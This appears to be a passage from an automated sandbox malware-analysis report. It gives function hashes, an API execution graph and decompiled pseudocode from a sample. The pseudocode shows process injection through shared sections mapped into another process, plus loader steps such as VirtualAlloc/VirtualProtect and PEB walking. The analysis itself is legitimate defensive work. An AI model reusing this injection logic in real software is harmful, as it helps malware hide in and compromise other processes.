                                                              • Instruction ID: 40d3aa908a1364c199142bdaba43035be63f35ac776698304478cbb413a6074c
                                                              • Opcode Fuzzy Hash: a79a3976ad42dffdb4b9f23f0dcdb041505745a5c7377fe6c1fdeee55a6d18bf
                                                              • Instruction Fuzzy Hash: CA41BB6154D3C38FD3135B34895C2A5BFB1AE132A071D01FBC0859F6E3E2AC498AE74A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040138D Relevance: .1, Instructions: 89COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.339575302.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 47018aa94879e589e5fe97380724ec48378f4e4f13e5e080189d20bb99b4c819
                                                              • Instruction ID: 7859e11a601f830c416081d1a240c1ae4dfaa68c737e7e1d7bde4fb82bf19632
                                                              • Opcode Fuzzy Hash: 47018aa94879e589e5fe97380724ec48378f4e4f13e5e080189d20bb99b4c819
                                                              • Instruction Fuzzy Hash: E6216B362042518BE710EE6DD4D0ED8B3A2DB52B15774067BC5529F2F2C67A980BDB82
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004013F5 Relevance: .1, Instructions: 78COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.339575302.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a61158bdb70bcea5c699f5fd2d16228c444316d159683ac9316f35b1325f4dcb
                                                              • Instruction ID: 52e89c93f6fac44c405c4240f06eb528f23f8c213f7340e09f4f92ab712d5060
                                                              • Opcode Fuzzy Hash: a61158bdb70bcea5c699f5fd2d16228c444316d159683ac9316f35b1325f4dcb
                                                              • Instruction Fuzzy Hash: 34218B323042118BD710AE6DD4D1DA877A2EF42B19364077BD0426F3E7CA66980BDB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00402709 Relevance: .1, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00402709(void* __edx) {
				void* _t4;

				 *((intOrPtr*)(_t4 - 0x77)) =  *((intOrPtr*)(_t4 - 0x77)) + __edx;
			}




                                                              0x00402709

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.339575302.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 87d419d6188a2738e2f2c00dc67292f4fff854e77fabeea3114364b6644172aa
                                                              • Instruction ID: f49f04df65efdbc823eaba2a273238ec4b787a924c6bca3718e86319e4f4c3e7
                                                              • Opcode Fuzzy Hash: 87d419d6188a2738e2f2c00dc67292f4fff854e77fabeea3114364b6644172aa
                                                              • Instruction Fuzzy Hash: 3801683450C204C7C312CAA88699CD9BB52AB52B94B340B7BD0067F7D2C1FF540BA757
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00401400 Relevance: .1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.339575302.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0179085889bbd093fbed8a5d9b130a6ebe2f7bf59d996b36afa4c83e22c98bd3
                                                              • Instruction ID: 100916c23b26695ea2a783252d444d73da3ca1ddec330752f51fd7f26c225d28
                                                              • Opcode Fuzzy Hash: 0179085889bbd093fbed8a5d9b130a6ebe2f7bf59d996b36afa4c83e22c98bd3
                                                              • Instruction Fuzzy Hash: 0C1149362082418FDB15EF7DC4E1EC87B72EB02B143660799C0414F3ABCE65940ADF81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00401427 Relevance: .0, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.339575302.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5b168283bc41ba20acaa4525e017d86fd830f342ba976e04d60df320f1696f26
                                                              • Instruction ID: 63f5e89b631bd3fb3acc1fb7aaa3163760696b324b3be71f28dbb10fe2a12503
                                                              • Opcode Fuzzy Hash: 5b168283bc41ba20acaa4525e017d86fd830f342ba976e04d60df320f1696f26
                                                              • Instruction Fuzzy Hash: 1401F9362446518FD714FE7DC4E0ADCB772EB02B143A50769D0514F3A7CA66980ADB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02070D90 Relevance: .0, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.340103222.0000000002070000.00000040.00001000.00020000.00000000.sdmp, Offset: 02070000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2070000_file.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                              • Instruction ID: 66d3bfaf20fd564e0585c70b27a7874832981b92015a23908fb0f7bf5be4acea
                                                              • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                              • Instruction Fuzzy Hash: A5012672E107008FDF22CF60C804BAA33F6FB86206F1542B5D90AD7281E370A841CB84
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Execution Graph

                                                              Execution Coverage:3.8%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:6%
                                                              Total number of Nodes:100
                                                              Total number of Limit Nodes:3
                                                              execution_graph 7180 6fc24e 7181 6fc25d 7180->7181 7184 6fc9ee 7181->7184 7185 6fca09 7184->7185 7186 6fca12 CreateToolhelp32Snapshot 7185->7186 7187 6fca2e Module32First 7185->7187 7186->7185 7186->7187 7188 6fca3d 7187->7188 7189 6fc266 7187->7189 7191 6fc6ad 7188->7191 7192 6fc6d8 7191->7192 7193 6fc6e9 VirtualAlloc 7192->7193 7194 6fc721 7192->7194 7193->7194 7349 402aa1 7350 402b0a 7349->7350 7351 402bcb 7350->7351 7352 401890 8 API calls 7350->7352 7352->7351 7217 6d0005 7233 6d092b GetPEB 7217->7233 7219 6d0030 7235 6d003c 7219->7235 7234 6d0972 7233->7234 7234->7219 7236 6d0049 7235->7236 7237 6d0e0f 2 API calls 7236->7237 7238 6d0223 7237->7238 7239 6d0d90 GetPEB 7238->7239 7240 6d0238 VirtualAlloc 7239->7240 7241 6d0265 7240->7241 7242 6d02ce VirtualProtect 7241->7242 7244 6d030b 7242->7244 7243 6d0439 VirtualFree 7247 6d04be LoadLibraryA 7243->7247 7244->7243 7246 6d08c7 7247->7246 7248 6d0001 7249 6d0005 7248->7249 7250 6d092b GetPEB 7249->7250 7251 6d0030 7250->7251 7252 6d003c 7 API calls 7251->7252 7253 6d0038 7252->7253 7254 6d0e0f 2 API calls 7253->7254 7255 6d0223 7254->7255 7256 6d0d90 GetPEB 7255->7256 7257 6d0238 VirtualAlloc 7256->7257 7258 6d0265 7257->7258 7259 6d02ce VirtualProtect 7258->7259 7261 6d030b 7259->7261 7260 6d0439 VirtualFree 7264 6d04be LoadLibraryA 7260->7264 7261->7260 7263 6d08c7 7264->7263 7161 6d003c 7162 6d0049 7161->7162 7174 6d0e0f SetErrorMode SetErrorMode 7162->7174 7167 6d0265 7168 6d02ce VirtualProtect 7167->7168 7170 6d030b 7168->7170 7169 6d0439 VirtualFree 7173 6d04be LoadLibraryA 7169->7173 7170->7169 7172 6d08c7 7173->7172 7175 6d0223 7174->7175 7176 6d0d90 7175->7176 7177 6d0dad 7176->7177 7178 6d0dbb GetPEB 7177->7178 7179 6d0238 VirtualAlloc 7177->7179 7178->7179 7179->7167 7195 402b36 7197 402b47 7195->7197 7196 402bcb 7197->7196 7199 401890 7197->7199 7200 401898 7199->7200 7201 4018c3 Sleep 7200->7201 7202 4018de 7201->7202 7204 4018ef 7202->7204 7205 4014cf 7202->7205 7204->7196 7206 4014df 7205->7206 7207 40156f NtDuplicateObject 7206->7207 7209 40168b 7206->7209 7208 40158c NtCreateSection 7207->7208 7207->7209 7210 4015b2 NtMapViewOfSection 7208->7210 7211 40160c NtCreateSection 7208->7211 7209->7204 7210->7211 7212 4015d5 NtMapViewOfSection 7210->7212 7211->7209 7213 401638 7211->7213 7212->7211 7214 4015f3 7212->7214 7213->7209 7215 401642 NtMapViewOfSection 7213->7215 7214->7211 7215->7209 7216 401669 NtMapViewOfSection 7215->7216 7216->7209 7265 4014db 7266 4014f1 7265->7266 7267 40156f NtDuplicateObject 7266->7267 7269 40168b 7266->7269 7268 40158c NtCreateSection 7267->7268 7267->7269 7270 4015b2 NtMapViewOfSection 7268->7270 7271 40160c NtCreateSection 7268->7271 7270->7271 7272 4015d5 NtMapViewOfSection 7270->7272 7271->7269 7273 401638 7271->7273 7272->7271 7276 4015f3 7272->7276 7273->7269 7274 401642 NtMapViewOfSection 7273->7274 7274->7269 7275 401669 NtMapViewOfSection 7274->7275 7275->7269 7276->7271 7313 40189d 7314 4018a0 7313->7314 7315 4018c3 Sleep 7314->7315 7316 4018de 7315->7316 7317 4014cf 7 API calls 7316->7317 7318 4018ef 7316->7318 7317->7318

                                                              Executed Functions

                                                              Function 004014CF Relevance: 10.7, APIs: 7, Instructions: 198nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 85 4014cf-401519 call 4011bb 94 40151b 85->94 95 40151e-401523 85->95 94->95 97 401845-40184d 95->97 98 401529-40153a 95->98 97->95 101 401540-401569 98->101 102 401843-401852 98->102 101->102 111 40156f-401586 NtDuplicateObject 101->111 105 401868 102->105 106 401859-401864 102->106 105->106 107 40186b-40188d call 4011bb 105->107 106->107 111->102 113 40158c-4015b0 NtCreateSection 111->113 115 4015b2-4015d3 NtMapViewOfSection 113->115 116 40160c-401632 NtCreateSection 113->116 115->116 117 4015d5-4015f1 NtMapViewOfSection 115->117 116->102 118 401638-40163c 116->118 117->116 120 4015f3-401609 117->120 118->102 121 401642-401663 NtMapViewOfSection 118->121 120->116 121->102 122 401669-401685 NtMapViewOfSection 121->122 122->102 124 40168b call 401690 122->124 124->102
                                                              C-Code - Quality: 58%
                                                              			E004014CF(void* __edx, void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				long _v12;
				void* _v16;
				void* _v20;
				char _v44;
				char _v52;
				long _v56;
				long _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _v96;
				char _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t84;
				intOrPtr _t87;
				void* _t90;
				signed int _t91;
				struct _GUID _t98;
				struct _GUID _t100;
				PVOID* _t102;
				PVOID* _t104;
				signed int _t106;
				intOrPtr* _t108;
				PVOID* _t121;
				PVOID* _t123;
				intOrPtr _t127;
				void* _t128;
				signed int _t129;
				void** _t130;
				signed int _t137;
				int _t138;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				void* _t160;
				intOrPtr* _t161;
				void* _t169;
				long _t170;
				intOrPtr _t171;
				void* _t172;
				void* _t177;
				HANDLE* _t178;
				HANDLE* _t179;
				void* _t184;
				intOrPtr* _t187;
				intOrPtr _t190;
				intOrPtr* _t191;
				signed int* _t192;
				signed int* _t193;
				signed int* _t195;
				signed int* _t196;
				long _t211;

				_t216 = __fp0;
				_t154 = __edx;
				_push(0x150b);
				_t84 =  *_t191;
				_t192 = _t191 + 4;
				_t128 = 0x37e;
				E004011BB(_t84, _t128, __edx, _t169, _t177, __eflags, __fp0);
				_t127 = _a4;
				_t170 = 0;
				_v56 = 0;
				if(gs != 0) {
					_v56 = _v56 + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t127 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
				}
				_v96 = _t87;
				_t178 =  &_v100;
				 *_t178 = _t170;
				 *((intOrPtr*)(_t127 + 0x4c))(_t87, _t178);
				_t90 =  *_t178;
				if(_t90 != 0) {
					_t130 =  &_v52;
					 *_t130 = _t90;
					_t130[1] = _t170;
					_t178 =  &_v44;
					 *((intOrPtr*)(_t127 + 0x10))(_t178, 0x18);
					 *_t178 = 0x18;
					_t154 = _t178;
					_push( &_v52);
					_push(_t178);
					_push(0x40);
					_push( &_v20);
					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, _t170, _t170, 2) == 0) {
						_v12 = _t170;
						_t98 =  &_v84;
						 *(_t98 + 4) = _t170;
						 *_t98 = 0x5000;
						_t179 =  &_v88;
						if(NtCreateSection(_t179, 6, _t170, _t98, 4, 0x8000000, _t170) == 0) {
							_push(_v84);
							_pop( *_t25);
							_t121 =  &_v72;
							 *_t121 = _t170;
							if(NtMapViewOfSection( *_t179, 0xffffffff, _t121, _t170, _t170, _t170,  &_v60, 1, _t170, 4) == 0) {
								_t123 =  &_v64;
								 *_t123 = _t170;
								if(NtMapViewOfSection( *_t179, _v16, _t123, _t170, _t170, _t170,  &_v60, 1, _t170, 4) == 0) {
									_t190 = _v72;
									 *((intOrPtr*)(_t127 + 0x20))(_t170, _t190, 0x104);
									 *((intOrPtr*)(_t190 + 0x208)) = _a16;
									_v12 = _v12 + 1;
								}
							}
						}
						_t100 =  &_v84;
						 *(_t100 + 4) = _t170;
						 *_t100 = _a12 + 0x10000;
						_t178 =  &_v92;
						if(NtCreateSection(_t178, 0xe, _t170, _t100, 0x40, 0x8000000, _t170) == 0 && _v12 != 0) {
							_push(_v84);
							_pop( *_t46);
							_t102 =  &_v76;
							 *_t102 = _t170;
							if(NtMapViewOfSection( *_t178, 0xffffffff, _t102, _t170, _t170, _t170,  &_v60, 1, _t170, 4) == 0) {
								_t104 =  &_v68;
								 *_t104 = _t170;
								_t211 = NtMapViewOfSection( *_t178, _v16, _t104, _t170, _t170, _t170,  &_v60, 1, _t170, 0x20);
								if(_t211 == 0) {
									L21();
									if(_t211 == 0 && _t211 != 0) {
										asm("in eax, 0x4a");
									}
									_push(0x2260);
									_t155 =  *_t192;
									_t195 =  &(_t192[1]);
									_push(_t155);
									_t106 =  *_t195;
									_t196 =  &(_t195[1]);
									_t156 = _t155 << 5;
									_t157 = _t156 + _t106;
									asm("lodsb");
									_t158 = _t157;
									asm("loop 0xffffffc3");
									_t159 = _t158 ^ 0xc66a5524;
									_t192 = _t196 - _t159;
									_t184 = _a8 +  *_a8;
									_t137 =  *(_t184 + 6) & 0x0000ffff;
									_push(_t184);
									_t160 = _t184;
									if(_v56 == 0) {
										_t161 = _t160 + 0xf8;
										__eflags = _t161;
									} else {
										_t161 = _t160 + 0x108;
									}
									_push(_t137);
									_t138 =  *(_t161 + 0x10);
									if(_t138 != 0) {
										memcpy( *((intOrPtr*)(_t161 + 0xc)) + _v76,  *((intOrPtr*)(_t161 + 0x14)) + _a8, _t138);
										_t192 =  &(_t192[3]);
									}
									asm("loop 0xffffffe6");
									_pop(_t178);
									_t215 = _v56;
									if(_v56 == 0) {
										_push(_t178);
										_t154 = _t178[0xd] - _v68;
										_t187 = _t178[0x28] + _v76;
										__eflags = _t187;
										while(1) {
											__eflags =  *_t187;
											if( *_t187 == 0) {
												break;
											}
											_t171 =  *_t187;
											_t187 = _t187 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t154;
												__eflags =  *((intOrPtr*)(0 + _v76 + _t171));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t178);
										_t170 = 0;
										__eflags = 0;
										_t108 =  &_v8;
										 *_t108 = 0;
										 *((intOrPtr*)(_t127 + 0x98))(_v16, 0, 0, 0, 0, 0, _t178[0xa] + _v68, _v64, _t108, 0);
									} else {
										L54();
										_pop(_t172);
										_t170 = _t172 - 0x1781;
										 *((intOrPtr*)(_t170 + 0x17b5)) = _t170 + 0x2c1d;
										E00401256(_t127, _t170 + 0x17b5, _t170, _t178, _t215, _t170 + 0x2c1d, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t170 + 0x17da)) = _t170 + 0x2c6d;
										_t154 = _v16;
										0x33();
									}
								}
							}
						}
					}
				}
				_push(0x150b);
				_t91 =  *_t192;
				_t193 =  &(_t192[1]);
				_push(0x37e);
				_t129 =  *_t193;
				return E004011BB(_t91, _t129, _t154, _t170, _t178, _t215, _t216);
			}

































































                                                              0x004014cf
                                                              0x004014cf
                                                              0x004014df
                                                              0x004014e4
                                                              0x004014e7
                                                              0x004014fe
                                                              0x00401506
                                                              0x0040150b
                                                              0x0040150e
                                                              0x00401510
                                                              0x00401519
                                                              0x0040151b
                                                              0x0040151b
                                                              0x0040151e
                                                              0x0040151e
                                                              0x00401523
                                                              0x00000000
                                                              0x00000000
                                                              0x0040184a
                                                              0x0040184a
                                                              0x00401529
                                                              0x0040152c
                                                              0x0040152f
                                                              0x00401533
                                                              0x00401536
                                                              0x0040153a
                                                              0x00401540
                                                              0x00401543
                                                              0x00401545
                                                              0x00401548
                                                              0x0040154e
                                                              0x00401551
                                                              0x00401557
                                                              0x0040155f
                                                              0x00401560
                                                              0x00401561
                                                              0x00401563
                                                              0x00401569
                                                              0x0040158c
                                                              0x0040158f
                                                              0x00401592
                                                              0x00401595
                                                              0x0040159b
                                                              0x004015b0
                                                              0x004015b2
                                                              0x004015b5
                                                              0x004015b8
                                                              0x004015bb
                                                              0x004015d3
                                                              0x004015d5
                                                              0x004015d8
                                                              0x004015f1
                                                              0x004015f3
                                                              0x004015fd
                                                              0x00401603
                                                              0x00401609
                                                              0x00401609
                                                              0x004015f1
                                                              0x004015d3
                                                              0x0040160c
                                                              0x00401618
                                                              0x0040161b
                                                              0x0040161d
                                                              0x00401632
                                                              0x00401642
                                                              0x00401645
                                                              0x00401648
                                                              0x0040164b
                                                              0x00401663
                                                              0x00401669
                                                              0x0040166c
                                                              0x00401683
                                                              0x00401685
                                                              0x0040168b
                                                              0x00401690
                                                              0x00401694
                                                              0x00401694
                                                              0x004016cf
                                                              0x004016d4
                                                              0x004016d7
                                                              0x004016e7
                                                              0x004016e8
                                                              0x004016eb
                                                              0x004016f8
                                                              0x00401702
                                                              0x00401711
                                                              0x00401719
                                                              0x0040171e
                                                              0x00401727
                                                              0x00401730
                                                              0x0040173c
                                                              0x0040173e
                                                              0x00401742
                                                              0x00401743
                                                              0x00401749
                                                              0x00401753
                                                              0x00401753
                                                              0x0040174b
                                                              0x0040174b
                                                              0x0040174b
                                                              0x00401759
                                                              0x0040175a
                                                              0x0040175f
                                                              0x0040176d
                                                              0x0040176d
                                                              0x0040176d
                                                              0x00401773
                                                              0x00401775
                                                              0x00401776
                                                              0x0040177a
                                                              0x004017e2
                                                              0x004017e6
                                                              0x004017f1
                                                              0x004017f1
                                                              0x004017f4
                                                              0x004017f4
                                                              0x004017f7
                                                              0x00000000
                                                              0x00000000
                                                              0x004017f9
                                                              0x00401803
                                                              0x00401808
                                                              0x0040180a
                                                              0x0040180f
                                                              0x0040181b
                                                              0x0040181b
                                                              0x0040181b
                                                              0x0040181d
                                                              0x0040181d
                                                              0x00401821
                                                              0x00401828
                                                              0x00401828
                                                              0x0040182a
                                                              0x0040182d
                                                              0x0040183d
                                                              0x0040177c
                                                              0x0040177c
                                                              0x00401781
                                                              0x00401782
                                                              0x00401798
                                                              0x004017a7
                                                              0x004017b4
                                                              0x004017cb
                                                              0x004017d6
                                                              0x004017d9
                                                              0x004017d9
                                                              0x0040177a
                                                              0x00401685
                                                              0x00401663
                                                              0x00401632
                                                              0x00401569
                                                              0x00401859
                                                              0x0040185e
                                                              0x00401861
                                                              0x00401872
                                                              0x00401877
                                                              0x0040188d

                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.384823661.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_dfhwrav.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: 61270f2820b76154097c11168e410355082364bb205f1f9274eadb9914c2945a
                                                              • Instruction ID: d7a87560e4518483a9a905c0811b8b4d92cc7fa9c4f71bddd110749a196bc2cc
                                                              • Opcode Fuzzy Hash: 61270f2820b76154097c11168e410355082364bb205f1f9274eadb9914c2945a
                                                              • Instruction Fuzzy Hash: 2E615F71900204FBEB219F91CC49FAF7BB8FF85B00F10412AF912BA2E5D6749A41CB65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004014DB Relevance: 10.7, APIs: 7, Instructions: 171nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 126 4014db-401519 call 4011bb 133 40151b 126->133 134 40151e-401523 126->134 133->134 136 401845-40184d 134->136 137 401529-40153a 134->137 136->134 140 401540-401569 137->140 141 401843-401852 137->141 140->141 150 40156f-401586 NtDuplicateObject 140->150 144 401868 141->144 145 401859-401864 141->145 144->145 146 40186b-40188d call 4011bb 144->146 145->146 150->141 152 40158c-4015b0 NtCreateSection 150->152 154 4015b2-4015d3 NtMapViewOfSection 152->154 155 40160c-401632 NtCreateSection 152->155 154->155 156 4015d5-4015f1 NtMapViewOfSection 154->156 155->141 157 401638-40163c 155->157 156->155 159 4015f3-401609 156->159 157->141 160 401642-401663 NtMapViewOfSection 157->160 159->155 160->141 161 401669-401685 NtMapViewOfSection 160->161 161->141 163 40168b call 401690 161->163 163->141
                                                              C-Code - Quality: 62%
                                                              			E004014DB(void* __edx, void* __edi, void* __esi, void* __fp0) {
				void* _t84;
				intOrPtr _t87;
				intOrPtr _t90;
				void* _t93;
				signed int _t94;
				struct _GUID _t101;
				struct _GUID _t103;
				PVOID* _t105;
				PVOID* _t107;
				signed int _t109;
				intOrPtr* _t111;
				PVOID* _t124;
				PVOID* _t126;
				intOrPtr _t131;
				void* _t133;
				signed int _t134;
				void** _t135;
				signed int _t142;
				int _t143;
				signed int _t160;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				void* _t165;
				intOrPtr* _t166;
				long _t175;
				intOrPtr _t177;
				void* _t178;
				HANDLE* _t184;
				HANDLE* _t186;
				void* _t191;
				intOrPtr* _t194;
				void* _t197;
				void* _t198;
				intOrPtr* _t200;
				signed int* _t201;
				signed int* _t202;
				signed int* _t205;
				signed int* _t206;
				void* _t207;
				long _t221;

				_t226 = __fp0;
				_t159 = __edx;
				_t207 = _t84 + 1;
				_push(0x150b);
				_t87 =  *_t200;
				_t201 = _t200 + 4;
				_t133 = 0x37e;
				E004011BB(_t87, _t133, __edx, __edi, __esi, _t207, __fp0);
				_t131 =  *((intOrPtr*)(_t198 + 8));
				_t175 = 0;
				 *((intOrPtr*)(_t198 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t198 - 0x34)) =  *((intOrPtr*)(_t198 - 0x34)) + 1;
				}
				while(1) {
					_t90 =  *((intOrPtr*)(_t131 + 0x48))();
					if(_t90 != 0) {
						break;
					}
					 *((intOrPtr*)(_t131 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t198 - 0x5c)) = _t90;
				_t184 = _t198 - 0x60;
				 *_t184 = _t175;
				 *((intOrPtr*)(_t131 + 0x4c))(_t90, _t184);
				_t93 =  *_t184;
				if(_t93 != 0) {
					_t135 = _t198 - 0x30;
					 *_t135 = _t93;
					_t135[1] = _t175;
					_t184 = _t198 - 0x28;
					 *((intOrPtr*)(_t131 + 0x10))(_t184, 0x18);
					 *_t184 = 0x18;
					_t159 = _t184;
					_push(_t198 - 0x30);
					_push(_t184);
					_push(0x40);
					_push(_t198 - 0x10);
					if( *((intOrPtr*)(_t131 + 0x70))() == 0 && NtDuplicateObject( *(_t198 - 0x10), 0xffffffff, 0xffffffff, _t198 - 0xc, _t175, _t175, 2) == 0) {
						 *(_t198 - 8) = _t175;
						_t101 = _t198 - 0x50;
						 *(_t101 + 4) = _t175;
						 *_t101 = 0x5000;
						_t186 = _t198 - 0x54;
						if(NtCreateSection(_t186, 6, _t175, _t101, 4, 0x8000000, _t175) == 0) {
							 *_t25 =  *(_t198 - 0x50);
							_t124 = _t198 - 0x44;
							 *_t124 = _t175;
							if(NtMapViewOfSection( *_t186, 0xffffffff, _t124, _t175, _t175, _t175, _t198 - 0x38, 1, _t175, 4) == 0) {
								_t126 = _t198 - 0x3c;
								 *_t126 = _t175;
								if(NtMapViewOfSection( *_t186,  *(_t198 - 0xc), _t126, _t175, _t175, _t175, _t198 - 0x38, 1, _t175, 4) == 0) {
									_t197 =  *(_t198 - 0x44);
									 *((intOrPtr*)(_t131 + 0x20))(_t175, _t197, 0x104);
									 *((intOrPtr*)(_t197 + 0x208)) =  *((intOrPtr*)(_t198 + 0x14));
									 *(_t198 - 8) =  *(_t198 - 8) + 1;
								}
							}
						}
						_t103 = _t198 - 0x50;
						 *(_t103 + 4) = _t175;
						 *_t103 =  *((intOrPtr*)(_t198 + 0x10)) + 0x10000;
						_t184 = _t198 - 0x58;
						if(NtCreateSection(_t184, 0xe, _t175, _t103, 0x40, 0x8000000, _t175) == 0 &&  *(_t198 - 8) != 0) {
							 *_t46 =  *(_t198 - 0x50);
							_t105 = _t198 - 0x48;
							 *_t105 = _t175;
							if(NtMapViewOfSection( *_t184, 0xffffffff, _t105, _t175, _t175, _t175, _t198 - 0x38, 1, _t175, 4) == 0) {
								_t107 = _t198 - 0x40;
								 *_t107 = _t175;
								_t221 = NtMapViewOfSection( *_t184,  *(_t198 - 0xc), _t107, _t175, _t175, _t175, _t198 - 0x38, 1, _t175, 0x20);
								if(_t221 == 0) {
									L20();
									if(_t221 == 0 && _t221 != 0) {
										asm("in eax, 0x4a");
									}
									_push(0x2260);
									_t160 =  *_t201;
									_t205 =  &(_t201[1]);
									_push(_t160);
									_t109 =  *_t205;
									_t206 =  &(_t205[1]);
									_t161 = _t160 << 5;
									_t162 = _t161 + _t109;
									asm("lodsb");
									_t163 = _t162;
									asm("loop 0xffffffc3");
									_t164 = _t163 ^ 0xc66a5524;
									_t201 = _t206 - _t164;
									_t191 =  *((intOrPtr*)(_t198 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t198 + 0xc))));
									_t142 =  *(_t191 + 6) & 0x0000ffff;
									_push(_t191);
									_t165 = _t191;
									if( *((intOrPtr*)(_t198 - 0x34)) == 0) {
										_t166 = _t165 + 0xf8;
										__eflags = _t166;
									} else {
										_t166 = _t165 + 0x108;
									}
									_push(_t142);
									_t143 =  *(_t166 + 0x10);
									if(_t143 != 0) {
										memcpy( *((intOrPtr*)(_t166 + 0xc)) +  *(_t198 - 0x48),  *((intOrPtr*)(_t166 + 0x14)) +  *((intOrPtr*)(_t198 + 0xc)), _t143);
										_t201 =  &(_t201[3]);
									}
									asm("loop 0xffffffe6");
									_pop(_t184);
									_t225 =  *((intOrPtr*)(_t198 - 0x34));
									if( *((intOrPtr*)(_t198 - 0x34)) == 0) {
										_push(_t184);
										_t159 = _t184[0xd] -  *(_t198 - 0x40);
										_t194 = _t184[0x28] +  *(_t198 - 0x48);
										__eflags = _t194;
										while(1) {
											__eflags =  *_t194;
											if( *_t194 == 0) {
												break;
											}
											_t177 =  *_t194;
											_t194 = _t194 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t159;
